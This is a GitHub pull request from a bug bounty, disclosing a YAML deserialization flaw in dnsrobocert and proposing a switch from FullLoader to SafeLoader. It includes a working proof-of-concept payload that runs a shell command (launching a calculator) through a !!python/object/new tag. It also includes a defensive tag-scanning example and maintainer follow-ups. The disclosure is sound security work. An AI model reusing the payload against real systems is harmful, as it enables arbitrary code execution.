This repository has been archived by the owner on Dec 19, 2023. It is now read-only.

FIX Arbitrary Code Execution in - dnsrobocert #1

Open
wants to merge 1 commit into
base: master

@b1nslashsh b1nslashsh commented Feb 9, 2021

📊 Metadata *

DNSroboCert is designed to manage Let's Encrypt SSL certificates based on DNS challenges, and it is vulnerable to arbitrary code execution.

Bounty URL:

https://www.huntr.dev/bounties/1-pip-dnsrobocert

⚙️ Description *

Changing FullLoader to SafeLoader in config.py will fix this issue.

💻 Technical Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

🐛 Proof of Concept (PoC) *

Installation

pip install dnsrobocert
Run exploit.py

import os
#os.system('pip install dnsrobocert')
from dnsrobocert.core import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.load('config.yml')

python3 exploit.py
The calc will poo

🔥 Proof of Fix (PoF) *

The arbitrary code execution has been fixed 👍

👍 User Acceptance Testing (UAT)

YAML load is working perfectly after the fix 👍

🔗 Relates to...

https://www.huntr.dev/bounties/1-pip-dnsrobocert
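
Added example, not part of the PR or of the dnsrobocert code base: a pre-load check that lists `python/*` tags in a config by composing the YAML node graph without constructing any objects, next to a SafeLoader load that rejects such tags. It assumes PyYAML is installed; the function names (`python_tags`, `load_config`, `is_rejected`) and both sample configs are constructed for illustration.

```python
import yaml  # PyYAML, assumed installed

PY_TAG_PREFIX = "tag:yaml.org,2002:python/"

# Constructed sample configs (not taken from the PR).
GOOD = "acme:\n  email_account: admin@example.test\nprofiles:\n  - name: demo\n"
TAGGED = (
    "acme:\n"
    "  email_account: admin@example.test\n"
    "hook: !!python/name:builtins.len\n"  # harmless python/* tag
)


def python_tags(text):
    """List (line, tag) for each node tagged python/*, without constructing objects."""
    found, seen = [], set()
    # compose_all() stops at the node graph: tags are resolved, nothing is built.
    stack = list(yaml.compose_all(text, Loader=yaml.SafeLoader))
    while stack:
        node = stack.pop()
        if id(node) in seen:  # anchors/aliases can make the graph cyclic
            continue
        seen.add(id(node))
        if node.tag.startswith(PY_TAG_PREFIX):
            found.append((node.start_mark.line + 1, node.tag))
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
    return sorted(found)


def load_config(text):
    """Load with SafeLoader, which only knows the standard YAML tags."""
    return yaml.load(text, Loader=yaml.SafeLoader)


def is_rejected(text):
    """True when SafeLoader refuses the document because of an unknown tag."""
    try:
        load_config(text)
    except yaml.constructor.ConstructorError:
        return True
    return False


if __name__ == "__main__":
    for name, doc in (("GOOD", GOOD), ("TAGGED", TAGGED)):
        print(name, python_tags(doc), "rejected" if is_rejected(doc) else "loaded")
```

The same `python_tags` check can run in CI over committed config files, so a tagged document is reported with its line number before any loader touches it.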

@huntr-helper
Member

👋 Hello, @adferrand - @b1nslashsh has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@adferrand & @b1nslashsh - thank you for your efforts in securing the world’s open source code! 🎉

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Feb 9, 2021
@b1nslashsh
Author

b1nslashsh commented Feb 22, 2021

hey @adferrand any update on this?

regards,
muhaimin

@adferrand

Sorry I am on holidays for now, I will look at it next week.

@b1nslashsh
Author

> Sorry I am on holidays for now, I will look at it next week.

That's great 👍🏻

@b1nslashsh
Author

> Sorry I am on holidays for now, I will look at it next week.

Hey @adferrand,
hope you are doing well.
Any updates on this? Sorry for disturbing you.

Regards, muhaimin

@Anon-Artist

Hi @adferrand, hope you are doing well.
Have you considered this issue?
I saw a new release on your repo, and the new release is also vulnerable to the same bug.
